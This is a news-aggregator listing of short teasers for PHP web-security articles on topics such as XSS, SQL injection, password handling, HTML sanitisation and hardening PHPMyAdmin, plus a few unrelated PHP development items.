Upcoming News » Security
Secure Input is a PHP class that allows you to secure your PHP application with a single function call.
For this it uses PHPIDS inputFilter and class. It also helps to secure your forms with unique tokens. In addition it allows for a session_start with checks of the owners.
You can find some documentation on Outweb.
Read More
Yeah, you read that right.
Kids, don’t try this sort of security in your own web apps. This is reserved for high-end financial institutions only.
Read More
First post of the series discussing various methods of including remote PHP code in your application - from security standpoint. In this post we discuss the history of remote code execution vulnerabilities in PHP apps and ways to prevent them
Read More
Cross-Site Scripting (XSS) is a type of attack where a hacker attempts to inject client-side scripting into a webpage that others are able to view. The attack could be as simple as an annoying alert window or as sophisticated as stealing a logged in user's credentials (commonly saved in browser cookies). With a user's credentials, a hacker could gain access to sensitive parts of your website or
Read More
There are many ways to handle passwords in your application, and a lot of different thoughts on it. You want to make sure your users are protected, but you also want to make sure that you are able to easily work with the data through the application. Here is how I handle passwords...
Read More
One of the issues Web Developers face is making their application robust to prevent SQL injection attacks. Different approaches exist which help. Sometimes people use large abstraction layers (which, sometimes, don't make anything safe ...) and sometimes people use prepared statements as a way to secure queries. Now prepared statements were a nice invention some 30 years ago abut they weren't mea
Read More
This weekend we had a hackday on PHPCR. The goal was to coordinate the efforts of Midgard to implement PHPCR with the Jackalope project. We ended up doing a few important cleanups to the PHPCR API definition (see below). We had Henri and Eero from the Midgard project, Benjamin from the Doctrine project and Jordi, Lukas, Chregu and myself (David) from Liip. On the second day, Uwe, Johannes and Da
Read More
As many of my readers know, I have a keen dislike for regular expression based HTML sanitisation. Regular expressions simply do not understand HTML’s nested nature and the numerous possible HTML/CSS standards it must abide by. The result is that far too many developers try to program this understanding (and unfortunately their lack of comprehensive understanding) into home grown sanitisers using
Read More
OTN has published two articles by Eli White that stem from his long experience with protecting high volume websites from unwanted and malicious use. Eli has worked on many large scale PHP projects including Digg, TripAdvisor, and for the Hubble...
Read More
I wanted to write something more useful today but instead I chose to waste a few hours on upgrading my current Symfony2 project to PR9 comming from PR7 effectively breaking it.
Read More
Hi, I am Lucas Carlson, founder and CEO of PHP Fog and the guy who hasn’t slept in almost 4 days. This is my story.
Read More
7 security measures to take to keep PHPMyAdmin from being hacked.
Read More
Maintainers of the PHP programming language spent the past few days scouring their source code for malicious modifications after discovering the security of one of their servers had been breached.
Read More
There are many ways to handle security in a web application, and many things to think about. This is by no means an in-depth look on application security. It is meant to be an overview of how to use the security features included in FuelPHP.
Read More
Zend_Http_Client_Adapter_Socket and stream_copy_to_stream used by it may run into infinite loop on some hosting with old PHP 5.2.x. Find how to workaround the problem.
Read More
